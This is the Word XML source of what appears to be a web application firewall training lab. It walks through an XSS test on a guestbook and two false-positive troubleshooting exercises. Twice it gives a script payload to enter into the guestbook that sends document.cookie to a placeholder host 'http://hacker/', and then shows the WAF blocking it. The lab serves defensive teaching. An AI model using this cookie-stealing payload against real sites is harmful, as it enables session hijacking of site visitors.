          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="09B6A24D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directly</w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="4C90C7E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="09B6A24D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="09B6A24D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> protected by the WAF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="6E7633A8" w:rsidRDefault="699639B3" w14:paraId="36E90849" w14:textId="2A30BBBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276"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6E7633A8" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter </w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;SCRIPT&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var+img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new+Image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>img.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="http://hacker/"%20+%20document.cookie;&lt;/SCRIPT&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>into the comment field of the guestbook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="6E7633A8" w:rsidRDefault="699639B3" w14:paraId="352D437B" w14:textId="0CCF9D30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276"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6E7633A8" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You have now imbedded a script in the comment that can display malicious content</w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="1169045D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="6E7633A8" w:rsidRDefault="699639B3" w14:paraId="2CB36A15" w14:textId="6F15CC79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276"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6E7633A8" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now navigate to your WAFs hostname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0630665A" w:rsidP="6E7633A8" w:rsidRDefault="0630665A" w14:paraId="4E0E37CF" w14:textId="41DAF5C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276"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6E7633A8" w:rsidR="0630665A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter </w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="0630665A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;SCRIPT&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="0630665A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var+img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="0630665A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="0630665A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new+Image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="0630665A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="0630665A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>img.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="0630665A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="http://hacker/"%20+%20document.cookie;&lt;/SCRIPT&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="0630665A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="6E7633A8" w:rsidR="0630665A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>into the comment field of the guestbook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="30DB4EA1" w:rsidRDefault="699639B3" w14:paraId="421EBA73" w14:textId="4E447FC2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276"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30DB4EA1" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The WAF has blocked the XSS attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="4048FE67" w14:textId="5AD3E8E5">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="00D140A2" w:rsidRDefault="00D140A2" w14:paraId="1599BA7C" w14:textId="35DE954E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>False Positive: Two Items in Cart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32965056" w:rsidRDefault="00D140A2" w14:paraId="470A70AF" w14:textId="1A9086BF">
      <w:pPr/>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32965056" w:rsidRDefault="00D140A2" w14:paraId="20185F0C" w14:textId="098555EF">
      <w:pPr/>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A0CB6E7">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>: This step in the lab does not work the same way it did last year when this lab was written in 2019, when the default for "Maximum Instances of Same Parameter” was set to 1</w:t>
      </w:r>
      <w:r w:rsidR="13E54334">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>Now, WAFaaS does not set any default value for “Maximum Instances of Same Parameter</w:t>
      </w:r>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t xml:space="preserve">  However, this step is left in for informational purposes, as this is still a common issue. See Appendix A for an example of this issue.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32965056" w:rsidRDefault="00D140A2" w14:paraId="06ABD740" w14:textId="2C9AC29A">
      <w:pPr/>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>The customer reports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32965056" w:rsidRDefault="00D140A2" w14:paraId="70E88A3D" w14:textId="10C61C47">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
      </w:pPr>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>I browsed the What’s New page on the site.  I Clicked “Snake Oil” and “Magic Rabbit” and then clicked “Add Items to Cart” on the bottom.  I got a block page!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32965056" w:rsidRDefault="00D140A2" w14:paraId="65B8BBD7" w14:textId="29647BF6">
      <w:pPr/>
      <w:r w:rsidR="4A0CB6E7">
        <w:drawing>
          <wp:inline wp14:editId="2488F647" wp14:anchorId="51537D5B">
            <wp:extent cx="3781425" cy="1381675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="700493506" name="Picture 326890911" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 326890911"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Re02e9111b8e944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81425" cy="1381675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32965056" w:rsidRDefault="00D140A2" w14:paraId="12C54E67" w14:textId="17C6D2F8">
      <w:pPr/>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>How can you make the customer happy?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32965056" w:rsidRDefault="00D140A2" w14:paraId="13FE590D" w14:textId="7183040D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32965056" w:rsidRDefault="00D140A2" w14:paraId="51ADCC37" w14:textId="5C7D3E8F">
      <w:pPr/>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>Try this yourself and look at the Firewall Logs</w:t>
      </w:r>
      <w:r w:rsidR="0A4F34C8">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>What is the reason it is blocking the request?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32965056" w:rsidRDefault="00D140A2" w14:paraId="2F1D385F" w14:textId="54C3CED8">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>Hint 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32965056" w:rsidRDefault="00D140A2" w14:paraId="4F041E21" w14:textId="5F2F208F">
      <w:pPr/>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>What component would you expect to use to control attacks in parameters, such as this one?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32965056" w:rsidRDefault="00D140A2" w14:paraId="66417891" w14:textId="1B8B623E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32965056" w:rsidRDefault="00D140A2" w14:paraId="4777965E" w14:textId="1F24F454">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>Add the Parameter Protection component.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32965056" w:rsidRDefault="00D140A2" w14:paraId="0271B7C4" w14:textId="05B42826">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>Find the Max Instances input and change it to 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32965056" w:rsidRDefault="00D140A2" w14:paraId="277C1846" w14:textId="59718E9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t>Click Save.</w:t>
      </w:r>
      <w:r w:rsidR="4A0CB6E7">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidRDefault="32F6121D" w14:paraId="2D4AB755" w14:textId="6120B2A9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="00D140A2" w:rsidRDefault="00D140A2" w14:paraId="5B428DB0" w14:textId="04B70E35">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>False Positive: Guestbook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="1BF00396" w14:textId="489AAB54"/>
    <w:p w:rsidR="009D66ED" w:rsidP="00D140A2" w:rsidRDefault="00D140A2" w14:paraId="2C26C156" w14:textId="39C356B6">
      <w:r>
        <w:t>The customer reports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32F6121D" w:rsidRDefault="00D140A2" w14:paraId="15E2460F" w14:textId="34572F69">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>I had a customer who was frustrated by the inability</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> to add two items to his </w:t>
      </w:r>
      <w:r w:rsidR="26E3DA47">
        <w:rPr/>
        <w:t>cart and</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> decided to rant about it on the Guestbook for all to see</w:t>
      </w:r>
      <w:r w:rsidR="22487173">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>He went to the Guestbook page, and typed in the following comment:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32F6121D" w:rsidRDefault="00D140A2" w14:paraId="20E2100C" w14:textId="13D0E6B9">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D" w:rsidR="00D140A2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">I tried to order from the union of your stores, but when I try to select a product, from your </w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="00D140A2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>selection</w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="00D140A2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, I </w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="1198FA11">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="00D140A2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="699639B3" w:rsidRDefault="24DC13B2" w14:paraId="51720D3B" w14:textId="080D4CC8">
      <w:r w:rsidR="24DC13B2">
        <w:rPr/>
        <w:t>To the customer’s surprise, he was blocked from posting the comment!</w:t>
      </w:r>
      <w:r w:rsidR="4C72CD17">
        <w:drawing>
          <wp:inline wp14:editId="5A8A28D9" wp14:anchorId="3FF86766">
            <wp:extent cx="2028825" cy="1202989"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1713045915" name="Picture 1713045915" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1713045915"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
